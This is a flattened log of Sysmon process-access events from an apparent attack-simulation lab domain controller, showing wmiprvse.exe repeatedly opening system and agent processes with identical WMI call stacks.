15:59:36.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026378Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026377Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026376Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026375Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026374Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026373Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026372Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026371Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026370Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026369Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026368Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026367Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026366Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026365Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026364Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026363Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026362Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026361Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026360Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026359Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 